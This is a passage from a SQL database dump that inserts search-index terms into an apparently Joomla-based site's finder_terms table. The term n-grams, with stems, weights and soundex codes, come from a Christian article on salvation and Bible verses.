(285382, 'and your conscience', 'and your conscience', 0, 1, 1.6333, 'A53625252', 2, '*'),
(285383, 'antioch', 'antioch', 0, 0, 0.4667, 'A532', 1, '*'),
(285384, 'antioch acts', 'antioch acts', 0, 1, 1.4, 'A53232', 1, '*'),
(285385, 'antioch acts 11', 'antioch acts 11', 0, 1, 1.5, 'A53232', 1, '*'),
(285386, 'appear approved', 'appear approved', 0, 1, 1.5, 'A161613', 1, '*'),
(285387, 'appear approved but', 'appear approved but', 0, 1, 1.6333, 'A16161313', 1, '*'),
(285388, 'approved', 'approv', 0, 0, 0.5333, 'A1613', 1, '*'),
(285389, 'approved but', 'approv but', 0, 1, 1.4, 'A161313', 1, '*'),
(285390, 'approved but that', 'approv but that', 0, 1, 1.5667, 'A161313', 1, '*'),
(285391, 'are not reprobates', 'ar not reprobates', 0, 1, 1.6, 'A653616132', 1, '*'),
(285392, 'are saved no', 'ar saved no', 0, 1, 1.4, 'A62135', 1, '*'),
(285393, 'are supposes', 'ar supposes', 0, 1, 1.4, 'A6212', 1, '*'),
(285394, 'are supposes to', 'ar supposes to', 0, 1, 1.5, 'A62123', 1, '*'),
(285395, 'as his', 'as his', 0, 1, 1.2, 'A200', 1, '*'),
(285396, 'as his lord', 'as his lord', 0, 1, 1.3667, 'A2463', 1, '*'),
(285397, 'as reprobates', 'as reprobates', 0, 1, 1.4333, 'A2616132', 1, '*'),
(285398, 'as reprobates 8', 'as reprobates 8', 0, 1, 1.5, 'A2616132', 1, '*'),
(285399, 'at stage', 'at stage', 0, 1, 1.2667, 'A3232', 1, '*'),
(285400, 'at stage one', 'at stage one', 0, 1, 1.4, 'A32325', 1, '*'),
(285401, 'at the time', 'at the time', 0, 1, 1.3667, 'A350', 1, '*'),
(285402, 'be as reprobates', 'be as reprobates', 0, 1, 1.5333, 'B2616132', 1, '*'),
(285403, 'be complete instant', 'be complete instant', 0, 1, 1.6333, 'B2514352353', 1, '*'),
(285404, 'be like that', 'be like that', 0, 1, 1.4, 'B423', 1, '*'),
(285405, 'be reprobates', 'be reprobates', 0, 1, 1.4333, 'B616132', 1, '*'),
(285406, 'be reprobates 6', 'be reprobates 6', 0, 1, 1.5, 'B616132', 1, '*'),
(285407, 'be saved everyday', 'be saved everyday', 0, 1, 1.5667, 'B213163', 1, '*'),
(285408, 'be today', 'be today', 0, 1, 1.2667, 'B300', 1, '*'),
(285409, 'be today your', 'be today your', 0, 1, 1.4333, 'B360', 1, '*'),
(285410, 'become a new', 'becom a new', 0, 1, 1.4, 'B250', 1, '*'),
(285411, 'before god james', 'befor god james', 0, 1, 1.5333, 'B623252', 1, '*'),
(285412, 'behaviour mindset', 'behaviour mindset', 0, 1, 1.5667, 'B65323', 1, '*'),
(285413, 'behaviour mindset values', 'behaviour mindset values', 0, 1, 1.8, 'B65323142', 1, '*'),
(285414, 'believers were', 'believ were', 0, 1, 1.4667, 'B41626', 1, '*'),
(285415, 'believers were first', 'believ were first', 0, 1, 1.6667, 'B416261623', 1, '*'),
(285416, 'bring defilement', 'bring defilement', 0, 1, 1.5333, 'B65231453', 1, '*'),
(285417, 'bring defilement gal', 'bring defilement gal', 0, 1, 1.6667, 'B6523145324', 1, '*'),
(285418, 'business practice', 'busi practice', 0, 1, 1.5667, 'B25216232', 1, '*'),
(285419, 'business practice relationships', 'busi practice relationships', 0, 1, 2, 'B252162326435212', 1, '*'),
(285420, 'but for the', 'but for the', 0, 1, 1.3667, 'B3163', 1, '*'),
(285421, 'but i trust', 'but i trust', 0, 1, 1.3667, 'B3623', 1, '*'),
(285422, 'but that ye', 'but that ye', 0, 1, 1.3667, 'B300', 1, '*'),
(285423, 'called christians in', 'call christians in', 0, 1, 1.6667, 'C432623525', 1, '*'),
(285424, 'can do nothing', 'can do nothing', 0, 1, 1.4667, 'C535352', 1, '*'),
(285425, 'can profess', 'can profess', 0, 1, 1.3667, 'C51612', 1, '*'),
(285426, 'can profess christianity', 'can profess christianity', 0, 1, 1.8, 'C5161262353', 1, '*'),
(285427, 'chosen god\'s', 'chosen god', 0, 1, 1.4, 'C5232', 1, '*'),
(285428, 'chosen god\'s kingdom', 'chosen god kingdom', 0, 1, 1.6667, 'C52325235', 1, '*'),
(285429, 'christ is in', 'christ is in', 0, 1, 1.4, 'C62325', 1, '*'),
(285430, 'christian one', 'christian one', 0, 1, 1.4333, 'C6235', 1, '*'),
(285431, 'christian one who', 'christian one who', 0, 1, 1.5667, 'C6235', 1, '*'),
(285432, 'christian simply', 'christian simply', 0, 1, 1.5333, 'C62352514', 1, '*'),
(285433, 'christian simply means', 'christian simply means', 0, 1, 1.7333, 'C6235251452', 1, '*'),
(285434, 'christian weights', 'christian weights', 0, 1, 1.5667, 'C6235232', 1, '*'),
(285435, 'christianity and', 'christian and', 0, 1, 1.5333, 'C6235353', 1, '*'),
(285436, 'christianity and still', 'christian and still', 0, 1, 1.7333, 'C6235353234', 1, '*'),
(285437, 'christians in antioch', 'christian in antioch', 0, 1, 1.7, 'C62352532', 1, '*'),
(285438, 'col', 'col', 0, 0, 0.2, 'C400', 1, '*'),
(285439, 'col 3', 'col 3', 0, 1, 1.1667, 'C400', 1, '*'),
(285440, 'col 3 1', 'col 3 1', 0, 1, 1.2333, 'C400', 1, '*'),
(285441, 'complete instant', 'complet instant', 0, 1, 1.5333, 'C514352353', 1, '*'),
(285442, 'complete instant salvation', 'complet instant salvation', 0, 1, 1.8667, 'C51435235324135', 1, '*'),
(285443, 'confession rom.10', 'confess rom.10', 0, 1, 1.5667, 'C512565', 1, '*'),
(285444, 'confession rom.10 9-10', 'confess rom.10 9-10', 0, 1, 1.7333, 'C512565', 1, '*'),
(285445, 'conscience pure', 'conscienc pure', 0, 1, 1.5, 'C525216', 1, '*'),
(285446, 'conscience pure before', 'conscienc pure before', 0, 1, 1.7333, 'C52521616', 1, '*'),
(285447, 'conscience void', 'conscienc void', 0, 1, 1.5, 'C525213', 1, '*'),
(285448, 'conscience void of', 'conscienc void of', 0, 1, 1.6, 'C5252131', 1, '*'),
(285449, 'corinthians 13 5-8', 'corinthian 13 5-8', 0, 1, 1.6, 'C65352', 1, '*'),
(285450, 'creature 2cor', 'creatur 2cor', 0, 1, 1.4333, 'C63626', 1, '*'),
(285451, 'creature 2cor 5', 'creatur 2cor 5', 0, 1, 1.5, 'C63626', 1, '*'),
(285452, 'dan.1', 'dan.1', 0, 0, 0.3333, 'D500', 1, '*'),
(285453, 'dan.1 8', 'dan.1 8', 0, 1, 1.2333, 'D500', 1, '*'),
(285454, 'dan.1 8 in', 'dan.1 8 in', 0, 1, 1.3333, 'D500', 1, '*'),
(285455, 'day the', 'dai the', 0, 1, 1.2333, 'D000', 1, '*'),
(285456, 'day the king\'s', 'dai the king', 0, 1, 1.4667, 'D252', 1, '*'),
(285457, 'defiled himself', 'defil himself', 0, 1, 1.5, 'D1435241', 1, '*'),
(285458, 'defiled himself with', 'defil himself with', 0, 1, 1.6667, 'D14352413', 1, '*'),
(285459, 'defilement gal', 'defil gal', 0, 1, 1.4667, 'D145324', 1, '*'),
(285460, 'defilement gal 5', 'defil gal 5', 0, 1, 1.5333, 'D145324', 1, '*'),
(285461, 'devil wants to', 'devil wants to', 0, 1, 1.4667, 'D145323', 1, '*'),
(285462, 'do no', 'do no', 0, 1, 1.1667, 'D500', 1, '*'),
(285463, 'do no evil', 'do no evil', 0, 1, 1.3333, 'D514', 1, '*'),
(285464, 'do nothing', 'do nothing', 0, 1, 1.3333, 'D5352', 1, '*'),
(285465, 'do nothing against', 'do nothing against', 0, 1, 1.6, 'D5352523', 1, '*'),
(285466, 'do that which', 'do that which', 0, 1, 1.4333, 'D200', 1, '*'),
(285467, 'doctrine it', 'doctrin it', 0, 1, 1.3667, 'D23653', 1, '*'),
(285468, 'doctrine it is', 'doctrin it is', 0, 1, 1.4667, 'D236532', 1, '*'),
(285469, 'e once', 'e once', 0, 1, 1.2, 'E520', 1, '*'),
(285470, 'e once you', 'e once you', 0, 1, 1.3333, 'E520', 1, '*'),
(285471, 'end then', 'end then', 0, 1, 1.2667, 'E535', 1, '*'),
(285472, 'end then you', 'end then you', 0, 1, 1.4, 'E535', 1, '*'),
(285473, 'eph 2', 'eph 2', 0, 1, 1.1667, 'E100', 1, '*'),
(285474, 'eph 2 1-22', 'eph 2 1-22', 0, 1, 1.3333, 'E100', 1, '*'),
(285475, 'error and it', 'error and it', 0, 1, 1.4, 'E653', 1, '*'),
(285476, 'everyday separating', 'everydai separating', 0, 1, 1.6333, 'E163216352', 1, '*'),
(285477, 'everyday separating yourself', 'everydai separating yourself', 0, 1, 1.9333, 'E1632163526241', 1, '*'),
(285478, 'evil not', 'evil not', 0, 1, 1.2667, 'E1453', 1, '*'),
(285479, 'evil not that', 'evil not that', 0, 1, 1.4333, 'E1453', 1, '*'),
(285480, 'examine yourselves', 'examin yourselves', 0, 1, 1.6, 'E2562412', 1, '*'),
(285481, 'examine yourselves whether', 'examin yourselves whether', 0, 1, 1.8667, 'E256241236', 1, '*'),
(285482, 'except', 'except', 0, 0, 0.4, 'E213', 5, '*'),
(285483, 'except ye', 'except ye', 0, 1, 1.3, 'E213', 1, '*'),
(285484, 'except ye be', 'except ye be', 0, 1, 1.4, 'E2131', 1, '*'),
(285485, 'experience all', 'experi all', 0, 1, 1.4667, 'E216524', 1, '*'),
(285486, 'experience all for', 'experi all for', 0, 1, 1.6, 'E21652416', 1, '*'),
(285487, 'faith prove', 'faith prove', 0, 1, 1.3667, 'F3161', 1, '*'),
(285488, 'faith prove your', 'faith prove your', 0, 1, 1.5333, 'F31616', 1, '*'),
(285489, 'fashion styles', 'fashion styles', 0, 1, 1.4667, 'F252342', 1, '*'),
(285490, 'fashion styles popular', 'fashion styles popular', 0, 1, 1.7333, 'F252342146', 1, '*'),
(285491, 'fear and', 'fear and', 0, 1, 1.2667, 'F653', 1, '*'),
(285492, 'fear and trembling', 'fear and trembling', 0, 1, 1.6, 'F653651452', 1, '*'),
(285493, 'first called', 'first called', 0, 1, 1.4, 'F623243', 1, '*'),
(285494, 'first called christians', 'first called christians', 0, 1, 1.7667, 'F623243262352', 1, '*'),
(285495, 'first in', 'first in', 0, 1, 1.2667, 'F6235', 1, '*'),
(285496, 'first in all', 'first in all', 0, 1, 1.4, 'F62354', 1, '*'),
(285497, 'for jesus joshua', 'for jesus joshua', 0, 1, 1.5333, 'F620', 1, '*'),
(285498, 'for the truth', 'for the truth', 0, 1, 1.4333, 'F6363', 1, '*'),
(285499, 'for we can', 'for we can', 0, 1, 1.3333, 'F625', 1, '*'),
(285500, 'for your salvation', 'for your salvation', 0, 1, 1.6, 'F624135', 1, '*'),
(285501, 'forsake all', 'forsak all', 0, 1, 1.3667, 'F624', 1, '*'),
(285502, 'forsake all one', 'forsak all one', 0, 1, 1.5, 'F6245', 1, '*'),
(285503, 'forsake others', 'forsak others', 0, 1, 1.4667, 'F62362', 1, '*'),
(285504, 'forsake others for', 'forsak others for', 0, 1, 1.6, 'F6236216', 1, '*'),
(285505, 'from things', 'from things', 0, 1, 1.3667, 'F65352', 1, '*'),
(285506, 'from things that', 'from things that', 0, 1, 1.5333, 'F653523', 1, '*'),
(285507, 'gal 5 16-21', 'gal 5 16-21', 0, 1, 1.3667, 'G400', 1, '*'),
(285508, 'get saved', 'get saved', 0, 1, 1.3, 'G3213', 1, '*'),
(285509, 'get saved ultimately', 'get saved ultimately', 0, 1, 1.6667, 'G321343534', 1, '*'),
(285510, 'getting your', 'get your', 0, 1, 1.4, 'G3526', 1, '*'),
(285511, 'getting your life', 'get your life', 0, 1, 1.5667, 'G352641', 1, '*'),
(285512, 'glory 1john', 'glori 1john', 0, 1, 1.3667, 'G4625', 1, '*'),
(285513, 'glory 1john 2', 'glori 1john 2', 0, 1, 1.4333, 'G4625', 1, '*'),
(285514, 'go to', 'go to', 0, 1, 1.1667, 'G300', 1, '*'),
(285515, 'go to hell', 'go to hell', 0, 1, 1.3333, 'G340', 1, '*'),
(285516, 'goal', 'goal', 0, 0, 0.2667, 'G400', 1, '*'),
(285517, 'goal for', 'goal for', 0, 1, 1.2667, 'G416', 1, '*'),
(285518, 'goal for your', 'goal for your', 0, 1, 1.4333, 'G416', 1, '*'),
(285519, 'god first', 'god first', 0, 1, 1.3, 'G31623', 1, '*'),
(285520, 'god first in', 'god first in', 0, 1, 1.4, 'G316235', 1, '*'),
(285521, 'god james', 'god james', 0, 1, 1.3, 'G3252', 1, '*'),
(285522, 'god james 1', 'god james 1', 0, 1, 1.3667, 'G3252', 1, '*'),
(285523, 'god that ye', 'god that ye', 0, 1, 1.3667, 'G300', 1, '*'),
(285524, 'god\'s goal', 'god goal', 0, 1, 1.3333, 'G324', 1, '*'),
(285525, 'god\'s goal for', 'god goal for', 0, 1, 1.4667, 'G32416', 1, '*'),
(285526, 'god\'s kingdom above', 'god kingdom above', 0, 1, 1.6333, 'G3252351', 1, '*'),
(285527, 'gradual', 'gradual', 0, 0, 0.4667, 'G634', 1, '*'),
(285528, 'gradual salvation', 'gradual salvation', 0, 1, 1.5667, 'G63424135', 1, '*'),
(285529, 'gradual salvation phil.2', 'gradual salvation phil.2', 0, 1, 1.8, 'G6342413514', 1, '*'),
(285530, 'happens at', 'happen at', 0, 1, 1.3333, 'H1523', 1, '*'),
(285531, 'happens at the', 'happen at the', 0, 1, 1.4667, 'H1523', 1, '*'),
(285532, 'has accepted', 'ha accepted', 0, 1, 1.4, 'H213', 1, '*'),
(285533, 'has accepted jesus', 'ha accepted jesus', 0, 1, 1.6, 'H2132', 1, '*'),
(285534, 'has become', 'ha become', 0, 1, 1.3333, 'H2125', 1, '*'),
(285535, 'has become a', 'ha become a', 0, 1, 1.4, 'H2125', 1, '*'),
(285536, 'has chosen', 'ha chosen', 0, 1, 1.3333, 'H250', 1, '*'),
(285537, 'has chosen god\'s', 'ha chosen god', 0, 1, 1.5333, 'H25232', 1, '*'),
(285538, 'has not defiled', 'ha not defiled', 0, 1, 1.5, 'H253143', 1, '*'),
(285539, 'have sin', 'have sin', 0, 1, 1.2667, 'H125', 1, '*'),
(285540, 'have sin mixed', 'have sin mixed', 0, 1, 1.4667, 'H12523', 1, '*'),
(285541, 'have to be', 'have to be', 0, 1, 1.3333, 'H131', 2, '*'),
(285542, 'heb 3', 'heb 3', 0, 1, 1.1667, 'H100', 1, '*'),
(285543, 'heb 3 6', 'heb 3 6', 0, 1, 1.2333, 'H100', 1, '*'),
(285544, 'heb.11', 'heb.11', 0, 0, 0.4, 'H100', 1, '*'),
(285545, 'heb.11 24-26', 'heb.11 24-26', 0, 1, 1.4, 'H100', 1, '*'),
(285546, 'heb.11 24-26 one', 'heb.11 24-26 one', 0, 1, 1.5333, 'H150', 1, '*'),
(285547, 'hell ultimate', 'hell ultimate', 0, 1, 1.4333, 'H4353', 1, '*'),
(285548, 'hell ultimate salvation', 'hell ultimate salvation', 0, 1, 1.7667, 'H435324135', 1, '*'),
(285549, 'hell watch', 'hell watch', 0, 1, 1.3333, 'H432', 1, '*'),
(285550, 'hell watch out', 'hell watch out', 0, 1, 1.4667, 'H4323', 1, '*'),
(285551, 'helps', 'help', 0, 0, 0.3333, 'H412', 1, '*'),
(285552, 'helps you', 'help you', 0, 1, 1.3, 'H412', 1, '*'),
(285553, 'helps you to', 'help you to', 0, 1, 1.4, 'H4123', 1, '*'),
(285554, 'himself with', 'himself with', 0, 1, 1.4, 'H52413', 1, '*'),
(285555, 'himself with what', 'himself with what', 0, 1, 1.5667, 'H52413', 1, '*'),
(285556, 'his conscience', 'hi conscience', 0, 1, 1.4667, 'H25252', 1, '*'),
(285557, 'his conscience pure', 'hi conscience pure', 0, 1, 1.6333, 'H2525216', 1, '*'),
(285558, 'his lord', 'hi lord', 0, 1, 1.2667, 'H2463', 1, '*'),
(285559, 'his lord and', 'hi lord and', 0, 1, 1.4, 'H246353', 1, '*'),
(285560, 'honest', 'honest', 0, 0, 0.4, 'H523', 1, '*'),
(285561, 'honest though', 'honest though', 0, 1, 1.4333, 'H5232', 1, '*'),
(285562, 'honest though we', 'honest though we', 0, 1, 1.5333, 'H5232', 1, '*'),
(285563, 'how that', 'how that', 0, 1, 1.2667, 'H300', 1, '*'),
(285564, 'how that jesus', 'how that jesus', 0, 1, 1.4667, 'H320', 1, '*'),
(285565, 'how we are', 'how we are', 0, 1, 1.3333, 'H600', 1, '*'),
(285566, 'i e once', 'i e once', 0, 1, 1.2667, 'I520', 1, '*'),
(285567, 'i pray to', 'i pray to', 0, 1, 1.3, 'I163', 1, '*'),
(285568, 'i trust', 'i trust', 0, 1, 1.2333, 'I3623', 1, '*'),
(285569, 'i trust that', 'i trust that', 0, 1, 1.4, 'I3623', 1, '*'),
(285570, 'idols', 'idol', 0, 0, 0.3333, 'I342', 1, '*'),
(285571, 'idols dan.1', 'idol dan.1', 0, 1, 1.3667, 'I34235', 1, '*'),
(285572, 'idols dan.1 8', 'idol dan.1 8', 0, 1, 1.4333, 'I34235', 1, '*'),
(285573, 'in antioch', 'in antioch', 0, 1, 1.3333, 'I532', 1, '*'),
(285574, 'in antioch acts', 'in antioch acts', 0, 1, 1.5, 'I53232', 1, '*'),
(285575, 'in our day', 'in our day', 0, 1, 1.3333, 'I563', 1, '*'),
(285576, 'in the faith', 'in the faith', 0, 1, 1.4, 'I5313', 1, '*'),
(285577, 'in you except', 'in you except', 0, 1, 1.4333, 'I5213', 1, '*'),
(285578, 'instant salvation', 'instant salvation', 0, 1, 1.5667, 'I5235324135', 1, '*'),
(285579, 'instant salvation this', 'instant salvation this', 0, 1, 1.7333, 'I523532413532', 1, '*'),
(285580, 'introduction christian', 'introduct christian', 0, 1, 1.7333, 'I536323526235', 1, '*'),
(285581, 'introduction christian simply', 'introduct christian simply', 0, 1, 1.9667, 'I5363235262352514', 1, '*'),
(285582, 'is a christian', 'is a christian', 0, 1, 1.4667, 'I26235', 1, '*'),
(285583, 'is a wrong', 'is a wrong', 0, 1, 1.3333, 'I2652', 1, '*'),
(285584, 'is error and', 'is error and', 0, 1, 1.4, 'I2653', 1, '*'),
(285585, 'is god\'s goal', 'is god goal', 0, 1, 1.4333, 'I2324', 1, '*'),
(285586, 'is honest', 'is honest', 0, 1, 1.3, 'I2523', 1, '*'),
(285587, 'is honest though', 'is honest though', 0, 1, 1.5333, 'I25232', 1, '*'),
(285588, 'is how we', 'is how we', 0, 1, 1.3, 'I200', 1, '*'),
(285589, 'is in you', 'is in you', 0, 1, 1.3, 'I250', 1, '*'),
(285590, 'is offered', 'is offered', 0, 1, 1.3333, 'I2163', 1, '*'),
(285591, 'is offered to', 'is offered to', 0, 1, 1.4333, 'I2163', 1, '*'),
(285592, 'is on', 'is on', 0, 1, 1.1667, 'I250', 1, '*'),
(285593, 'is on three', 'is on three', 0, 1, 1.3667, 'I2536', 1, '*'),
(285594, 'isa.8', 'isa.8', 0, 0, 0.3333, 'I200', 1, '*'),
(285595, 'isa.8 18', 'isa.8 18', 0, 1, 1.2667, 'I200', 1, '*'),
(285596, 'isa.8 18 acts', 'isa.8 18 acts', 0, 1, 1.4333, 'I232', 1, '*'),
(285597, 'it will take', 'it will take', 0, 1, 1.4, 'I3432', 1, '*'),
(285598, 'item 32', 'item 32', 0, 1, 1.2333, 'I350', 1, '*'),
(285599, 'item 32 the', 'item 32 the', 0, 1, 1.3667, 'I353', 1, '*'),
(285600, 'its glory', 'it glory', 0, 1, 1.3, 'I3246', 1, '*'),
(285601, 'its glory 1john', 'it glory 1john', 0, 1, 1.5, 'I324625', 1, '*'),
(285602, 'james 1 26-27', 'jame 1 26-27', 0, 1, 1.4333, 'J520', 1, '*'),
(285603, 'jesus and that', 'jesu and that', 0, 1, 1.4667, 'J530', 1, '*'),
(285604, 'jesus as his', 'jesu as his', 0, 1, 1.4, 'J000', 1, '*'),
(285605, 'jesus christ is', 'jesu christ is', 0, 1, 1.5, 'J6232', 1, '*'),
(285606, 'jesus joshua', 'jesu joshua', 0, 1, 1.4, 'J000', 1, '*'),
(285607, 'jesus joshua 24', 'jesu joshua 24', 0, 1, 1.5, 'J000', 1, '*'),
(285608, 'john 3 8', 'john 3 8', 0, 1, 1.2667, 'J500', 1, '*'),
(285609, 'john 3 8-9', 'john 3 8-9', 0, 1, 1.3333, 'J500', 1, '*'),
(285610, 'joshua 24', 'joshua 24', 0, 1, 1.3, 'J000', 1, '*'),
(285611, 'joshua 24 15', 'joshua 24 15', 0, 1, 1.4, 'J000', 1, '*'),
(285612, 'just weights', 'just weights', 0, 1, 1.4, 'J3232', 1, '*'),
(285613, 'just weights helps', 'just weights helps', 0, 1, 1.6, 'J3232412', 1, '*'),
(285614, 'k2 item 32', 'k2 item 32', 0, 1, 1.3333, 'K350', 1, '*'),
(285615, 'keep his', 'keep his', 0, 1, 1.2667, 'K120', 1, '*'),
(285616, 'keep his conscience', 'keep his conscience', 0, 1, 1.6333, 'K125252', 1, '*'),
(285617, 'king\'s', 'king', 0, 0, 0.4, 'K520', 2, '*'),
(285618, 'king\'s meat', 'king meat', 0, 1, 1.3667, 'K5253', 1, '*'),
(285619, 'king\'s meat means', 'king meat means', 0, 1, 1.5667, 'K525352', 1, '*'),
(285620, 'kingdom above', 'kingdom above', 0, 1, 1.4333, 'K52351', 1, '*'),
(285621, 'kingdom above the', 'kingdom above the', 0, 1, 1.5667, 'K523513', 1, '*'),
(285622, 'know that we', 'know that we', 0, 1, 1.4, 'K530', 1, '*'),
(285623, 'know ye', 'know ye', 0, 1, 1.2333, 'K500', 1, '*'),
(285624, 'know ye not', 'know ye not', 0, 1, 1.3667, 'K530', 1, '*'),
(285625, 'latest', 'latest', 0, 0, 0.4, 'L323', 1, '*'),
(285626, 'latest fashion', 'latest fashion', 0, 1, 1.4667, 'L323125', 1, '*'),
(285627, 'latest fashion styles', 'latest fashion styles', 0, 1, 1.7, 'L3231252342', 1, '*'),
(285628, 'levels', 'level', 0, 0, 0.4, 'L142', 2, '*'),
(285629, 'levels and', 'level and', 0, 1, 1.3333, 'L14253', 1, '*'),
(285630, 'levels and you', 'level and you', 0, 1, 1.4667, 'L14253', 1, '*'),
(285631, 'life straight', 'life straight', 0, 1, 1.4333, 'L123623', 1, '*'),
(285632, 'life straight before', 'life straight before', 0, 1, 1.6667, 'L12362316', 1, '*'),
(285633, 'life the devil', 'life the devil', 0, 1, 1.4667, 'L1314', 1, '*'),
(285634, 'like that of', 'like that of', 0, 1, 1.4, 'L231', 1, '*'),
(285635, 'like”.', 'like”.', 0, 0, 0.4, 'L200', 1, '*'),
(285636, 'like”. the', 'like”. the', 0, 1, 1.3333, 'L230', 1, '*'),
(285637, 'like”. the believers', 'like”. the believers', 0, 1, 1.6667, 'L2314162', 1, '*'),
(285638, 'lk.14', 'lk.14', 0, 0, 0.3333, 'L200', 1, '*'),
(285639, 'lk.14 18-19', 'lk.14 18-19', 0, 1, 1.3667, 'L200', 1, '*'),
(285640, 'lk.14 18-19 26', 'lk.14 18-19 26', 0, 1, 1.4667, 'L200', 1, '*'),
(285641, 'lk.18', 'lk.18', 0, 0, 0.3333, 'L200', 1, '*'),
(285642, 'lk.18 20', 'lk.18 20', 0, 1, 1.2667, 'L200', 1, '*'),
(285643, 'lk.18 20 lk.9', 'lk.18 20 lk.9', 0, 1, 1.4333, 'L242', 1, '*'),
(285644, 'lk.5', 'lk.5', 0, 0, 0.2667, 'L200', 1, '*'),
(285645, 'lk.5 11', 'lk.5 11', 0, 1, 1.2333, 'L200', 1, '*'),
(285646, 'lk.5 11 one', 'lk.5 11 one', 0, 1, 1.3667, 'L250', 1, '*'),
(285647, 'lk.9', 'lk.9', 0, 0, 0.2667, 'L200', 1, '*'),
(285648, 'lk.9 59-62', 'lk.9 59-62', 0, 1, 1.3333, 'L200', 1, '*'),
(285649, 'lk.9 59-62 one', 'lk.9 59-62 one', 0, 1, 1.4667, 'L250', 1, '*'),
(285650, 'manifestations were', 'manifest were', 0, 1, 1.6333, 'M123526', 1, '*'),
(285651, 'manifestations were seen', 'manifest were seen', 0, 1, 1.8, 'M12352625', 1, '*'),
(285652, 'matt.10', 'matt.10', 0, 0, 0.4667, 'M300', 1, '*'),
(285653, 'matt.10 35', 'matt.10 35', 0, 1, 1.3333, 'M300', 1, '*'),
(285654, 'matt.10 35 lk.14', 'matt.10 35 lk.14', 0, 1, 1.5333, 'M342', 1, '*'),
(285655, 'matt.24 13', 'matt.24 13', 0, 1, 1.3333, 'M300', 1, '*'),
(285656, 'matt.24 13 heb', 'matt.24 13 heb', 0, 1, 1.4667, 'M310', 1, '*'),
(285657, 'matt.7', 'matt.7', 0, 0, 0.4, 'M300', 1, '*'),
(285658, 'matt.7 21-24', 'matt.7 21-24', 0, 1, 1.4, 'M300', 1, '*'),
(285659, 'matt.7 21-24 one', 'matt.7 21-24 one', 0, 1, 1.5333, 'M350', 1, '*'),
(285660, 'matter what you', 'matter what you', 0, 1, 1.5, 'M363', 1, '*'),
(285661, 'means latest', 'mean latest', 0, 1, 1.4, 'M24323', 1, '*'),
(285662, 'means latest fashion', 'mean latest fashion', 0, 1, 1.6667, 'M24323125', 1, '*'),
(285663, 'means “christ', 'mean “christ', 0, 1, 1.4333, 'M2623', 1, '*'),
(285664, 'means “christ like”.', 'mean “christ like”.', 0, 1, 1.6667, 'M262342', 1, '*'),
(285665, 'meat', 'meat', 0, 0, 0.2667, 'M300', 1, '*'),
(285666, 'meat means', 'meat means', 0, 1, 1.3333, 'M352', 1, '*'),
(285667, 'meat means latest', 'meat means latest', 0, 1, 1.5667, 'M3524323', 1, '*'),
(285668, 'mindset values', 'mindset values', 0, 1, 1.4667, 'M323142', 1, '*'),
(285669, 'mindset values and', 'mindset values and', 0, 1, 1.6, 'M32314253', 1, '*'),
(285670, 'mixed', 'mix', 0, 0, 0.3333, 'M230', 1, '*'),
(285671, 'mixed up', 'mix up', 0, 1, 1.2667, 'M231', 1, '*'),
(285672, 'mixed up with', 'mix up with', 0, 1, 1.4333, 'M2313', 1, '*'),
(285673, 'must experience', 'must experience', 0, 1, 1.5, 'M2321652', 1, '*'),
(285674, 'must experience all', 'must experience all', 0, 1, 1.6333, 'M23216524', 1, '*'),
(285675, 'new creature 2cor', 'new creature 2cor', 0, 1, 1.5667, 'N263626', 1, '*'),
(285676, 'no evil', 'no evil', 0, 1, 1.2333, 'N140', 1, '*'),
(285677, 'no evil not', 'no evil not', 0, 1, 1.3667, 'N1453', 1, '*'),
(285678, 'not defiled', 'not defiled', 0, 1, 1.3667, 'N3143', 1, '*'),
(285679, 'not defiled himself', 'not defiled himself', 0, 1, 1.6333, 'N31435241', 1, '*'),
(285680, 'not reprobates', 'not reprobates', 0, 1, 1.4667, 'N3616132', 1, '*'),
(285681, 'not reprobates 7', 'not reprobates 7', 0, 1, 1.5333, 'N3616132', 1, '*'),
(285682, 'not that', 'not that', 0, 1, 1.2667, 'N300', 1, '*'),
(285683, 'not that we', 'not that we', 0, 1, 1.3667, 'N300', 1, '*'),
(285684, 'not your', 'not your', 0, 1, 1.2667, 'N360', 1, '*'),
(285685, 'not your own', 'not your own', 0, 1, 1.4, 'N365', 1, '*'),
(285686, 'nothing against', 'noth against', 0, 1, 1.5, 'N352523', 1, '*'),
(285687, 'nothing against the', 'noth against the', 0, 1, 1.6333, 'N352523', 1, '*'),
(285688, 'now i pray', 'now i pray', 0, 1, 1.3333, 'N160', 1, '*'),
(285689, 'of confession', 'of confession', 0, 1, 1.4333, 'O125125', 1, '*'),
(285690, 'of confession rom.10', 'of confession rom.10', 0, 1, 1.6667, 'O12512565', 1, '*'),
(285691, 'of jesus and', 'of jesus and', 0, 1, 1.4, 'O1253', 1, '*'),
(285692, 'of just weights', 'of just weights', 0, 1, 1.5, 'O123232', 1, '*'),
(285693, 'of offence', 'of offence', 0, 1, 1.3333, 'O152', 1, '*'),
(285694, 'of offence who', 'of offence who', 0, 1, 1.4667, 'O152', 1, '*'),
(285695, 'offence', 'offenc', 0, 0, 0.4667, 'O152', 1, '*'),
(285696, 'offence who', 'offenc who', 0, 1, 1.3667, 'O152', 1, '*'),
(285697, 'offence who is', 'offenc who is', 0, 1, 1.4667, 'O152', 1, '*'),
(285698, 'offered', 'offer', 0, 0, 0.4667, 'O163', 1, '*'),
(285699, 'offered to', 'offer to', 0, 1, 1.3333, 'O163', 1, '*'),
(285700, 'offered to idols', 'offer to idols', 0, 1, 1.5333, 'O16342', 1, '*'),
(285701, 'on three', 'on three', 0, 1, 1.2667, 'O536', 1, '*'),
(285702, 'on three levels', 'on three levels', 0, 1, 1.5, 'O5364142', 1, '*'),
(285703, 'one so', 'on so', 0, 1, 1.2, 'O520', 1, '*'),
(285704, 'one so they', 'on so they', 0, 1, 1.3667, 'O523', 1, '*'),
(285705, 'one who', 'on who', 0, 1, 1.2333, 'O500', 2, '*'),
(285706, 'one who has', 'on who has', 0, 1, 1.3667, 'O520', 1, '*'),
(285707, 'one who is', 'on who is', 0, 1, 1.3333, 'O520', 1, '*'),
(285708, 'one who puts', 'on who puts', 0, 1, 1.4, 'O5132', 1, '*'),
(285709, 'one who trembles', 'on who trembles', 0, 1, 1.5333, 'O5365142', 1, '*'),
(285710, 'operations that', 'oper that', 0, 1, 1.5, 'O163523', 1, '*'),
(285711, 'operations that have', 'oper that have', 0, 1, 1.6667, 'O1635231', 1, '*'),
(285712, 'others for', 'other for', 0, 1, 1.3333, 'O36216', 1, '*'),
(285713, 'others for jesus', 'other for jesus', 0, 1, 1.5333, 'O362162', 1, '*'),
(285714, 'our day', 'our day', 0, 1, 1.2333, 'O630', 1, '*');
INSERT INTO `y57u5_finder_terms` (`term_id`, `term`, `stem`, `common`, `phrase`, `weight`, `soundex`, `links`, `language`) VALUES
(285715, 'our day the', 'our day the', 0, 1, 1.3667, 'O630', 1, '*'),
